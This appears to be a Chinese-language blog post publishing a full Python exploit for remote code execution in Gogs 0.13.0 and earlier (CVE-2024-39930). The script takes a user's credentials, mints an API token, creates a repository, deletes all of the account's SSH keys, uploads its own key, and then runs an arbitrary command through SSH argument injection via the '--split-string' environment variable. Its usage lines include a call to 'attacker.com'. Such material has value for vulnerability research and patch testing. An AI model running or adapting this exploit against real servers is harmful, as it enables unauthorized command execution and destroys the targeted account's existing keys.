Gogs 0.13.0 远程代码执行漏洞利用详解

本文详细介绍了Gogs 0.13.0版本中的远程代码执行漏洞(CVE-2024-39930),包含完整的Python利用代码、API调用流程和SSH参数注入技术实现细节。

漏洞标题: gogs 0.13.0 - 远程代码执行(RCE)

日期: 2025年6月27日

漏洞作者: Ardayfio Samuel Nii Aryee

软件链接: https://github.com/gogs/gogs.git

版本: gogs <=0.13.0

测试环境: Ubuntu

CVE: CVE-2024-39930

===============================

使用示例:

python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned"

python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://attacker.com" --ssh-port 2222

===============================

import argparse
import base64
import random
import string
import sys
from urllib.parse import urlparse

import paramiko
import requests

# Base URL of the Gogs REST API, prepended to every request path by the
# http_* helpers. Empty until main() derives it from the command-line URL.
API_BASE_URL = ""

def generate_random_string(length=8, charset=None):
    """Return a random string of ``length`` characters drawn from ``charset``.

    Args:
        length: Number of characters to produce.
        charset: Sequence of characters to sample from (with replacement).
            Defaults to ASCII letters plus digits.

    Returns:
        The generated string; empty when ``length`` is 0.

    Note:
        Uses the non-cryptographic ``random`` module, so the result is only
        suitable for throwaway names, not for secrets.
    """
    if charset is None:
        charset = string.ascii_letters + string.digits
    return "".join(random.choices(charset, k=length))

def make_headers(token=None, basic_auth=None):
    """Build the HTTP headers for a JSON API request.

    Args:
        token: API token; when truthy it is sent as ``Authorization: token ...``
            and ``basic_auth`` is ignored.
        basic_auth: ``"username:password"`` string; used only when ``token`` is
            falsy, sent base64-encoded as ``Authorization: Basic ...``.

    Returns:
        A new dict that always contains ``Content-Type: application/json`` and
        contains ``Authorization`` only when one of the credentials was given.
    """
    headers = {"Content-Type": "application/json"}
    if token:
        headers["Authorization"] = f"token {token}"
    elif basic_auth:
        b64 = base64.b64encode(basic_auth.encode()).decode()
        headers["Authorization"] = f"Basic {b64}"
    return headers

def http_post(path, json=None, headers=None, timeout=30):
    """POST to ``API_BASE_URL + path`` and return the response.

    Args:
        path: API path appended verbatim to ``API_BASE_URL``.
        json: Object serialized as the JSON request body.
        headers: HTTP headers to send.
        timeout: Seconds to wait for the server before giving up, so an
            unresponsive host cannot block the script indefinitely.

    Returns:
        The ``requests.Response`` for a successful request.

    Raises:
        requests.HTTPError: If the server answers with a 4xx/5xx status.
        requests.RequestException: On connection errors or timeouts.
    """
    url = f"{API_BASE_URL}{path}"
    response = requests.post(url, json=json, headers=headers, timeout=timeout)
    response.raise_for_status()
    return response

def http_get(path, headers=None, timeout=30):
    """GET ``API_BASE_URL + path`` and return the response.

    Args:
        path: API path appended verbatim to ``API_BASE_URL``.
        headers: HTTP headers to send.
        timeout: Seconds to wait for the server before giving up, so an
            unresponsive host cannot block the script indefinitely.

    Returns:
        The ``requests.Response`` for a successful request.

    Raises:
        requests.HTTPError: If the server answers with a 4xx/5xx status.
        requests.RequestException: On connection errors or timeouts.
    """
    url = f"{API_BASE_URL}{path}"
    response = requests.get(url, headers=headers, timeout=timeout)
    response.raise_for_status()
    return response

def http_delete(path, headers=None, timeout=30):
    """Send DELETE to ``API_BASE_URL + path`` and return the response.

    Args:
        path: API path appended verbatim to ``API_BASE_URL``.
        headers: HTTP headers to send.
        timeout: Seconds to wait for the server before giving up, so an
            unresponsive host cannot block the script indefinitely.

    Returns:
        The ``requests.Response`` for a successful request.

    Raises:
        requests.HTTPError: If the server answers with a 4xx/5xx status.
        requests.RequestException: On connection errors or timeouts.
    """
    url = f"{API_BASE_URL}{path}"
    response = requests.delete(url, headers=headers, timeout=timeout)
    response.raise_for_status()
    return response

def obtain_api_token(username, password):
    """Create an API token for ``username`` using HTTP Basic authentication.

    The token is created under a random name via
    ``POST /users/{username}/tokens``.

    Args:
        username: Account name.
        password: Account password.

    Returns:
        The token string taken from the ``sha1`` field of the JSON response.

    On any failure the error is printed and the process exits with status 1.
    """
    auth = f"{username}:{password}"
    headers = make_headers(basic_auth=auth)
    data = {"name": generate_random_string()}

    try:
        response = http_post(f"/users/{username}/tokens", json=data, headers=headers)
        token = response.json()['sha1']
        print(f"[+] API Token Acquired: {token}")
        return token
    except Exception as e:
        print(f"[!] Failed to obtain API token: {e}")
        sys.exit(1)

def create_repo(token):
    """Create a public repository with a random name for the token's owner.

    Args:
        token: API token used to authenticate ``POST /user/repos``.

    Returns:
        The ``full_name`` field of the JSON response.

    On any failure the error is printed and the process exits with status 1.
    """
    repo_name = generate_random_string()
    headers = make_headers(token=token)
    data = {
        "name": repo_name,
        "description": "Auto-created repository",
        "private": False,
    }

    try:
        response = http_post("/user/repos", json=data, headers=headers)
        full_name = response.json()['full_name']
        print(f"[+] Repository Created: {full_name}")
        return full_name
    except Exception as e:
        print(f"[!] Failed to create repository: {e}")
        sys.exit(1)

def delete_existing_ssh_keys(token):
    """Delete every SSH key returned by ``GET /user/keys`` for the token's owner.

    WARNING: this is destructive. All keys listed for the account are removed,
    not only keys this script added, and they are not restored afterwards.

    Args:
        token: API token used to authenticate the list and delete requests.

    On any failure the error is printed and the process exits with status 1;
    keys deleted before the failure stay deleted.
    """
    headers = make_headers(token=token)
    try:
        response = http_get("/user/keys", headers=headers)
        keys = response.json()
        for key in keys:
            key_id = key['id']
            http_delete(f"/user/keys/{key_id}", headers=headers)
            print(f"[+] Deleted SSH Key ID: {key_id}")
    except Exception as e:
        print(f"[!] Failed to delete existing SSH keys: {e}")
        sys.exit(1)

def add_ssh_key(public_key_path, token):
    """Register the public key at ``public_key_path`` on the token's account.

    All SSH keys already present on the account are deleted first (see
    ``delete_existing_ssh_keys``), then the file's contents are uploaded via
    ``POST /user/keys`` under a random title.

    Args:
        public_key_path: Path to the public key file to upload.
        token: API token used to authenticate the requests.

    On any failure the error is printed and the process exits with status 1.
    """
    delete_existing_ssh_keys(token)

    try:
        with open(public_key_path, 'r') as f:
            key = f.read()
    except Exception as e:
        print(f"[!] Failed to read public key file: {e}")
        sys.exit(1)

    headers = make_headers(token=token)
    data = {
        "title": generate_random_string(),
        "key": key
    }

    try:
        response = http_post("/user/keys", json=data, headers=headers)
        print(f"[+] SSH Key Added: {response.status_code}")
    except Exception as e:
        print(f"[!] Failed to add SSH key: {e}")
        sys.exit(1)

def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command):
    """Open an SSH session to the target and run the proof-of-concept request.

    The session sets an environment variable named ``--split-string`` whose
    value is ``command``, then requests ``git-upload-pack`` on ``repo_path``
    and prints whatever the server writes to stderr and stdout.

    Args:
        ssh_user: SSH user name to authenticate as.
        ssh_host: Host name or address of the SSH server.
        ssh_port: SSH port; converted with ``int()`` before connecting.
        private_key_path: Path to the private key file. Loaded with
            ``paramiko.RSAKey``, so it must be an RSA key.
        repo_path: Repository path passed to ``git-upload-pack``.
        command: Value placed in the ``--split-string`` environment variable.

    On any failure the error is printed and the process exits with status 1.
    Unknown host keys are accepted automatically (``AutoAddPolicy``).
    """
    try:
        key = paramiko.RSAKey.from_private_key_file(private_key_path)
    except Exception as e:
        print(f"[!] Failed to load SSH key: {e}")
        sys.exit(1)

    client = paramiko.SSHClient()
    try:
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)

        session = client.get_transport().open_session()

        print("[+] Executing command...... ")
        session.set_environment_variable("--split-string", command)
        session.exec_command(f"git-upload-pack {repo_path}")

        stdout = session.makefile('rb', 1024)
        stderr = session.makefile_stderr('rb', 1024)

        print("STDERR:", stderr.read().decode())
        print("STDOUT:", stdout.read().decode())

        session.close()
    except Exception as e:
        print(f"[!] Error: {e}")
        sys.exit(1)
    finally:
        # Runs on success and on the sys.exit() path alike, so the connection
        # is never left open.
        client.close()

def main():
    """Parse the command line and run the steps in order.

    Steps: derive ``API_BASE_URL`` from the given URL, obtain an API token,
    create a repository, register the public key, then call ``exploit``.

    Exits with status 1 if the URL or the ``username:password`` argument is
    malformed, or if any step fails.
    """
    global API_BASE_URL

    parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)")
    parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)")
    parser.add_argument("auth", help="Gogs credentials in the format username:password")
    parser.add_argument("private_key", help="Path to private SSH key")
    parser.add_argument("public_key", help="Path to public SSH key")
    parser.add_argument("command", help="Command to execute remotely")
    parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use")
    args = parser.parse_args()

    parsed_url = urlparse(args.url)
    # Without a scheme urlparse() yields no hostname, which would otherwise
    # surface later as a confusing request or connection error.
    if not parsed_url.scheme or not parsed_url.hostname:
        print("[!] Invalid URL: expected a full URL such as http://host:3000")
        sys.exit(1)

    API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1"
    ssh_host = parsed_url.hostname
    # NOTE(review): when --ssh-port is omitted this falls back to the port in
    # the web URL, which is normally the HTTP port rather than the SSH port.
    # Confirm this is intended.
    ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22)

    try:
        # Split on the first colon only so passwords containing ':' are kept intact.
        username, password = args.auth.split(":", 1)
    except ValueError:
        print("[!] Invalid format for auth argument")
        sys.exit(1)

    token = obtain_api_token(username, password)
    repo_path = create_repo(token)
    add_ssh_key(args.public_key, token)

    exploit(
        ssh_user=username,
        ssh_host=ssh_host,
        ssh_port=ssh_port,
        private_key_path=args.private_key,
        repo_path=repo_path,
        command=args.command,
    )

# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计